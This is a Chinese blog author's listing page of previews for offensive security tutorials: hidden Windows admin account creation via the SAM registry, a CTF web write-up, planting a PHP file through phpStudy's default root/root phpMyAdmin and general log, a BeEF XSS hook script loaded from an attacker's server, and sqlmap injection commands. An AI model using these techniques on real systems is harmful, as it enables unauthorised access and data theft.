![](https://img-blog.csdnimg.cn/20201014180756913.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
漏洞利用
诸神之眼
这个作者很懒,什么都没留下…
展开
-
windows7系统 隐藏账户的创建 远程获取控制权
本文章使用windows7旗舰版系统,kali Linux系统,在VMware下进行啊演示。 1.对注册表授权win+r //运行regedit.exe //进入注册表HKEY_LOCAL_MACHINE/SAM/SAM修改SAM文件夹权限(右击SAM-权限 设置Administrators用户允许完全控制)2.新建特殊帐户以管理员权限...原创 2018-07-24 09:56:14 · 1825 阅读 · 0 评论 -
解网鼎杯一道web题(fakebook)
扫描:nikto扫描:发现隐藏的robots.txt,其中有源码泄漏(/user.php.bak),输入到地址栏,得到文件user.php.bak。然后用御剑扫描,发现flag.php。user.php.bak源码:<?phpclass UserInfo{ public $name = ""; public $age = 0; public $...原创 2018-08-23 10:20:18 · 13396 阅读 · 3 评论 -
针对phpstudy默认设置的利用
在phpstudy下载下来以后路径,设置没有修改的情况下可以使用此方法url:http://ip/phpmyadmin用户名:root 密码:root登入管理界面变量-->general log 参数改为ongeneral log file参数改为网页根目录下新建一个php文件(D:\phpStudy\PHPTutorial\WWW\login.php )SQL插入...原创 2018-10-06 08:47:09 · 1287 阅读 · 0 评论 -
BeEF利用XSS漏洞
XSS跨站脚本攻击,检测与利用方法poe:<script>alert('XSS')</script>exp:<script src="http://<beef服务端ip>:3000/hook.js"></script>//攻击者ipkali下:find / -name beef-xss ...原创 2018-10-06 22:10:16 · 2509 阅读 · 0 评论 -
常见SQLMAP使用方法详解
一、SQLMAP用于Access数据库注入(1) 猜解是否能注入 win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" Linux : .lmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" (2) 猜解表 win: py...原创 2018-10-25 17:52:43 · 562 阅读 · 0 评论